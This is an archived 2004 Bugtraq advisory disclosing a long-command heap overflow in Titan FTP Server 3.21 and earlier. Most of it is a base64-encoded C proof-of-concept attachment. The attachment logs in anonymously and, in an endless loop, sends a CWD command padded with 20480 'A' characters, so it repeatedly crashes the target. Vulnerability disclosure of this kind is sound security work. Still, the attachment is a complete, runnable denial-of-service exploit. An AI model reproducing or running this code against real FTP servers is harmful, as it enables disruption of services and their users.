[36330] in bugtraq
[vulnwatch] Titan FTP Server Long Command Heap Overflow Vulnerability
daemon@ATHENA.MIT.EDU (lion)
Tue Aug 31 13:07:33 2004
Message-ID: <20040829182944.11540.qmail@mail.securityfocus.com>
Date: Mon, 30 Aug 2004 02:38:00 +0800
From: "lion" <lion@cnhonker.net>
To: "bugtraq" <bugtraq@securityfocus.com>
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="=====001_Dragon376856131321_====="
This is a multi-part message in MIME format.
--=====001_Dragon376856131321_=====
Content-Type: text/plain;
charset="gb2312"
Content-Transfer-Encoding: 7bit
[vulnwatch] Titan FTP Server Long Command Heap Overflow Vulnerability
www.cnhonker.com
Security Advisory
Advisory Name: Titan FTP Server Long Command Heap Overflow Vulnerability
Release Date: 08/30/2004
Affected version: Titan FTP Server <= 3.21
Author: lion <lion@cnhonker.net>
Overview:
A vulnerability has been found in Titan FTP Server. The problem \
is when a user logged in, send a command with 20480 size to target \
will make a heap overflow.
for example:
"CWD xxxxxxxxxxx..."
"LIST xxxxxxxxxxx..."
"STAT xxxxxxxxxxx..."
....
Exploit:
PoC exploit attached.
About HUC:
HUC is still alive.
--=====001_Dragon376856131321_=====
Content-Type: application/octet-stream;
name="titanftp.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="titanftp.c"
LyoNCiotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KKiANCiogdGl0YW5mdHAuYyAtIFRpVGFuIEZUUCBTZXJ2ZXIg
TG9uZyBDb21tYW5kIEhlYXAgT3ZlcmZsb3cgUG9DIEV4cGxvaXQNCioNCiogQ29weXJpZ2h0IChD
KSAyMDAwLTIwMDQgSFVDIEFsbCBSaWdodHMgUmVzZXJ2ZWQuDQoqDQoqIEF1dGhvciAgIDogbGlv
bg0KKiAgICAgICAgICA6IGxpb25AY25ob25rZXIubmV0DQoqICAgICAgICAgIDogaHR0cDovL3d3
dy5jbmhvbmtlci5jb20NCiogRGF0ZSAgICAgOiAyMDA0LTA4LTMwDQoqDQoqLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0NCiovDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNpbmNsdWRl
IDx3aW5zb2NrMi5oPiANCg0KI3ByYWdtYSBjb21tZW50KGxpYiwgIndzMl8zMi5saWIiKQ0KDQoj
ZGVmaW5lIEZUUFBPUlQgICAgICAyMQ0KI2RlZmluZSBCVUZGU0laRSAgICAgMjA0ODAwDQojZGVm
aW5lIE9WRVJGTE9XU0laRSAyMDQ4MA0KI2RlZmluZSBTSVpFICAgICAgICAgMjA0OCAgICAgIA0K
DQovLyBmdW5jdGlvbg0KaW50IGNyZWF0ZV9zb2NrZXQoKTsNCmludCBjbGllbnRfY29ubmVjdChp
bnQgc29ja2ZkLGNoYXIqIHNlcnZlcixpbnQgcG9ydCk7DQppbnQgd3JpdGVidWYoY2hhciAqcyxp
bnQgc29ja2V0LGNoYXIgKmJ1ZmZlcixpbnQgbGVuKTsNCmludCByZWFkYnVmKGNoYXIgKnMsaW50
IHNvY2tldCxjaGFyICpidWZmZXIsaW50IGxlbik7DQp2b2lkIGNoZWNrc3RhdHVzKGNoYXIgKnMp
Ow0Kdm9pZCBsb2dpbmZ0cChTT0NLRVQgc29ja2ZkLCBjaGFyICp1c2VyLCBjaGFyICpwYXNzKTsN
Cg0KaW50IHNob3cgPSAxOw0KY2hhciByZWN2YnVmW0JVRkZTSVpFXTsNCmNoYXIgc2VuZGJ1ZltC
VUZGU0laRV07DQoNCnZvaWQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KICAgIFdT
QURBVEEgd3NhOw0KICAgIHVuc2lnbmVkIHNob3J0ICAgIHBvcnQ7DQogICAgdW5zaWduZWQgbG9u
ZyAgICAgaXA7DQogICAgY2hhciB1c2VyWzMyXSA9ICJhbm9ueW1vdXMiOw0KICAgIGNoYXIgcGFz
c1szMl0gPSAiYW5vbnltb3VzIjsNCiAgICANCiAgICBjaGFyICpjb21tYW5kID0gIkNXRCAiOw0K
DQogICAgU09DS0VUIHM7DQogICAgaW50IHNpemUgPSBPVkVSRkxPV1NJWkU7DQoNCiAgICBwcmlu
dGYoIlRpVGFuIEZUUCBTZXJ2ZXIgTG9uZyBDb21tYW5kIEhlYXAgT3ZlcmZsb3cgUG9DIEV4cGxv
aXRcclxuIik7DQogICAgcHJpbnRmKCJsaW9uIGxpb24jY25ob25rZXIubmV0LCBodHRwOi8vd3d3
LmNuaG9ua2VyLmNvbVxyXG5cbiIpOw0KDQogICAgaWYoYXJnYyA8IDMpDQogICAgew0KICAgICAg
ICBwcmludGYoIiVzIDxUYXJnZXRIb3N0PiA8VGFyZ2V0UG9ydD5cclxuIiwgYXJndlswXSk7DQog
ICAgICAgIHJldHVybjsNCiAgICB9DQogICAgDQogICAgV1NBU3RhcnR1cChNQUtFV09SRCgyLDIp
LCZ3c2EpOw0KDQogICAgd2hpbGUoMSkNCiAgICB7DQogICAgICAgIGlmKChzPWNyZWF0ZV9zb2Nr
ZXQoKSk9PTApIA0KICAgICAgICB7DQogICAgICAgICAgICBwcmludGYoIlstXSBFUlJPUjogQ3Jl
YXRlIHNvY2tldCBmYWlsZWQuXHJcbiIpOw0KICAgICAgICAgICAgcmV0dXJuOw0KICAgICAgICB9
DQogICAgICANCiAgICAgICAgaWYoIWNsaWVudF9jb25uZWN0KHMsIGFyZ3ZbMV0sIGF0b2koYXJn
dlsyXSkpKQ0KICAgICAgICAgICAgZXhpdCgtMSk7DQogICAgDQogICAgICAgIGxvZ2luZnRwKHMs
IHVzZXIsIHBhc3MpOw0KICAgIA0KICAgICAgICBtZW1zZXQoc2VuZGJ1ZiwgMCAsQlVGRlNJWkUp
Ow0KICAgICAgICBtZW1jcHkoc2VuZGJ1ZiwgInBhc3ZcclxuIiwgNik7DQogICAgICAgIHdyaXRl
YnVmKCJTZW5kIHBhc3YiLCBzLCBzZW5kYnVmLCA2KTsNCiAgICAgICAgcmVhZGJ1ZigicmVhZCIs
IHMsIHJlY3ZidWYsIEJVRkZTSVpFKTsNCiAgICANCiAgICAgICAgbWVtc2V0KHNlbmRidWYsIDAs
IEJVRkZTSVpFKTsNCiAgICAgICAgbWVtc2V0KHNlbmRidWYsICdBJywgc2l6ZSk7DQogICAgICAg
IG1lbWNweShzZW5kYnVmLCBjb21tYW5kLCBzdHJsZW4oY29tbWFuZCkpOw0KICAgICAgICBzZW5k
YnVmW3NpemUtMl0gPSdccic7DQogICAgICAgIHNlbmRidWZbc2l6ZS0xXSA9J1xuJzsNCiAgICAN
CiAgICAgICAgcHJpbnRmKCJidWZmIHNpemUgOiVkXHJcbiVzXHJcbiIsIHN0cmxlbihzZW5kYnVm
KSwgc2VuZGJ1Zik7DQogICAgICAgIHNob3c9MTsNCiAgICAgICAgd3JpdGVidWYoIlNlbmQgb3Zl
cmZsb3cgYnVmZiIsIHMsIHNlbmRidWYsIHNpemUpOw0KICAgICAgICByZWFkYnVmKCJyZWFkIiwg
cywgcmVjdmJ1ZiwgQlVGRlNJWkUpOw0KICAgICAgICANCiAgICAgICAgLy9zZW5kIFFVSVQNCiAg
ICAgICAgbWVtc2V0KHNlbmRidWYsMCwgQlVGRlNJWkUpOw0KICAgICAgICBzcHJpbnRmKHNlbmRi
dWYsICIlc1xyXG4iLCAiUVVJVCIpOw0KICAgICAgICB3cml0ZWJ1ZigiU2VuZCBRVUlUIiwgcywg
c2VuZGJ1Ziwgc3RybGVuKHNlbmRidWYpKTsNCiAgICANCiAgICAgICAgLy9zaG93PTE7DQogICAg
ICAgIC8vcmVhZGJ1ZigiWytdIFFVSVQuLi4uLi4iLCBzLCByZWN2YnVmLCBCVUZGU0laRSk7ICAg
IA0KICAgICAgICAvL3JldHVybjsNCiAgICAgICAgDQogICAgICAgIGlmKHMpDQogICAgICAgICAg
ICBjbG9zZXNvY2tldChzKTsNCiAgICAgICAgICAgIA0KICAgICAgICBTbGVlcCgyMDAwKTsNCiAg
ICB9DQogICAgDQogICAgV1NBQ2xlYW51cCgpOw0KfQ0KDQppbnQgY3JlYXRlX3NvY2tldCgpDQp7
ICANCiAgICBpbnQgc29ja2ZkOw0KICANCiAgICBzb2NrZmQ9c29ja2V0KEFGX0lORVQsU09DS19T
VFJFQU0sMCk7DQogICAgaWYoc29ja2ZkPDApDQogICAgew0KICAgICAgICBwcmludGYoIlstXSBD
cmVhdGUgc29ja2V0IGVycm9yLlxyXG4iKTsNCiAgICAgICAgcmV0dXJuKDApOw0KICAgIH0NCiAg
ICANCiAgICByZXR1cm4oc29ja2ZkKTsgICAgDQp9DQoNCmludCBjbGllbnRfY29ubmVjdChpbnQg
c29ja2ZkLGNoYXIqIHNlcnZlcixpbnQgcG9ydCkNCnsNCiAgICBzdHJ1Y3Qgc29ja2FkZHJfaW4g
Y2xpYWRkcjsNCiAgICBzdHJ1Y3QgaG9zdGVudCAqaG9zdDsNCg0KICAgIGlmKChob3N0PWdldGhv
c3RieW5hbWUoc2VydmVyKSk9PU5VTEwpDQogICAgew0KICAgICAgICBwcmludGYoIlstXSBFUlJP
UjogZ2V0aG9zdGJ5bmFtZSglcykgZXJyb3JcbiIsIHNlcnZlcik7DQogICAgICAgIHJldHVybigt
MSk7DQogICAgfSAgICAgIA0KICAgIA0KICAgIG1lbXNldCgmY2xpYWRkciwgMCwgc2l6ZW9mKHN0
cnVjdCBzb2NrYWRkcikpOw0KDQogICAgY2xpYWRkci5zaW5fZmFtaWx5PUFGX0lORVQ7DQogICAg
Y2xpYWRkci5zaW5fcG9ydD1odG9ucyhwb3J0KTsNCiAgICBjbGlhZGRyLnNpbl9hZGRyPSooKHN0
cnVjdCBpbl9hZGRyICopaG9zdC0+aF9hZGRyKTsNCiAgICBwcmludGYoIlsrXSBUcnlpbmcgJXM6
JWQuLi4uLi4iLCBzZXJ2ZXIsIHBvcnQpOw0KICAgIGZmbHVzaChzdGRvdXQpOw0KDQogICAgaWYo
Y29ubmVjdChzb2NrZmQsKHN0cnVjdCBzb2NrYWRkciAqKSZjbGlhZGRyLHNpemVvZihzdHJ1Y3Qg
c29ja2FkZHIpKTwwKQ0KICAgIHsNCiAgICAgICAgcHJpbnRmKCJGQUlMRUQhXHJcbiIpOw0KICAg
ICAgICBjbG9zZXNvY2tldChzb2NrZmQpOw0KICAgICAgICByZXR1cm4oLTEpOw0KICAgIH0NCg0K
ICAgIHByaW50ZigiT0shXHJcbiIpOw0KICAgIHJldHVybigxKTsNCn0NCg0KaW50IHdyaXRlYnVm
KGNoYXIgKnMsaW50IHNvY2tldCxjaGFyICpidWZmZXIsaW50IGxlbikNCnsNCiAgICBpbnQgajsN
Cg0KICAgIGlmKHMpDQogICAgew0KICAgICAgICBwcmludGYoIlsrXSAlcy4uLi4uLiIsIHMpOw0K
ICAgICAgICBmZmx1c2goc3Rkb3V0KTsNCiAgICB9ICAgIA0KDQogICAgaj1zZW5kKHNvY2tldCxi
dWZmZXIsbGVuLDApOw0KICAgIGlmKGo8PTApDQogICAgew0KICAgICAgICBwcmludGYoIkZBSUxF
RCFcclxuIik7DQogICAgICAgICAgICBleGl0KC0xKTsNCiAgICB9ICAgIA0KICAgIHByaW50Zigi
T0shXHJcbiIpOw0KICAgIHJldHVybiBqOw0KfQ0KDQppbnQgcmVhZGJ1ZihjaGFyICpzLGludCBz
b2NrZXQsY2hhciAqYnVmZmVyLGludCBsZW4pDQp7DQogICAgaW50IGEsYixpLGo9MDsNCiAgICAN
CiAgICBhPWI9aT0wOw0KICAgIG1lbXNldChidWZmZXIsMCxsZW4pOw0KDQogICAgaWYocykNCiAg
ICB7DQogICAgICAgIHByaW50ZigiWytdICVzLi4uLi4uIiwgcyk7DQogICAgICAgIGZmbHVzaChz
dGRvdXQpOw0KICAgIH0NCg0KICAgIGo9cmVjdihzb2NrZXQsYnVmZmVyLGxlbi0xLDApOw0KICAg
IGlmKGogPD0gMCkNCiAgICB7DQogICAgICAgIGlmKHMpIHByaW50ZigiRkFJTEVEIVxuIik7DQog
ICAgICAgICAgICBwcmludGYoIlstXSBSZWN2IGRhdGEgZXJyb3IuXG4iKTsNCiAgICAgICAgZXhp
dCgtMSk7DQogICAgfSAgICANCiAgICAgICAgDQogICAgaWYocykgcHJpbnRmKCJPSyFcbiIpOw0K
DQogICAgYnVmZmVyW2xlbi0xXT0nXDAnOw0KDQogICAgaWYoc2hvdz09MSkgIHByaW50ZigiPD09
XHJcbiVzPD09XHJcbiIsYnVmZmVyKTsNCg0KICAgIHJldHVybiBqOw0KfQ0KDQp2b2lkIGNoZWNr
c3RhdHVzKGNoYXIgKnMpDQp7DQogICAgaWYocz09TlVMTCkgZXhpdCgtMSk7DQogICAgaWYoaXNk
aWdpdCgqcykpDQogICAgew0KICAgICAgICBpZihzWzBdPT0nNScpDQogICAgICAgIHsgICAgDQog
ICAgICAgICAgICBwcmludGYoIlstXSBTZXJ2ZXIgdG9sZDolc1xuIixzKTsNCiAgICAgICAgICAg
IGV4aXQoLTEpOw0KICAgICAgICB9DQogICAgICAgIGVsc2UgcmV0dXJuOw0KICAgIH0NCg0KICAg
IHByaW50ZigiWy1dIFNlcnZlciBzYWlkOiVzXG4iLHMpOw0KICAgIGV4aXQoLTEpOw0KfQ0KDQp2
b2lkIGxvZ2luZnRwKFNPQ0tFVCBzb2NrZmQsIGNoYXIgKnVzZXIsIGNoYXIgKnBhc3MpDQp7DQog
ICAgaW50IGo7DQogICAgDQogICAgc2hvdz0xOw0KICAgIHJlYWRidWYoIkdldCBGVFAgU2VydmVy
IGJhbm5lciIsc29ja2ZkLCByZWN2YnVmLCBTSVpFKTsNCiAgICAvL3Nob3c9MDsNCg0KICAgIC8v
c2VuZCBVU0VSIHVzZXJuYW1lDQogICAgbWVtc2V0KHNlbmRidWYsMCxCVUZGU0laRSk7DQogICAg
aj1zcHJpbnRmKHNlbmRidWYsIiVzICVzXHJcbiIsICJVU0VSIiwgdXNlcik7DQogICAgd3JpdGVi
dWYoIlNlbmQgVVNFUiIsIHNvY2tmZCxzZW5kYnVmLGopOw0KICAgIHJlYWRidWYoTlVMTCxzb2Nr
ZmQsIHJlY3ZidWYsIEJVRkZTSVpFKTsNCiAgICBjaGVja3N0YXR1cyhyZWN2YnVmKTsNCg0KICAg
IC8vc2VuZCBQQVNTIHBhc3N3b3JkDQogICAgbWVtc2V0KHNlbmRidWYsMCxCVUZGU0laRSk7DQog
ICAgaj1zcHJpbnRmKHNlbmRidWYsIiVzICVzXHJcbiIsIlBBU1MiLCBwYXNzKTsNCiAgICB3cml0
ZWJ1ZigiU2VuZCBQQVNTIiwgc29ja2ZkLCBzZW5kYnVmLCBqKTsNCiAgICByZWFkYnVmKE5VTEws
c29ja2ZkLHJlY3ZidWYsIEJVRkZTSVpFKTsNCiAgICBjaGVja3N0YXR1cyhyZWN2YnVmKTsNCiAg
ICBwcmludGYoIlsrXSBVc2VyICVzIGxvZ2dlZCBpbi5cclxuIiwgdXNlcik7DQp9DQo=
--=====001_Dragon376856131321_=====--
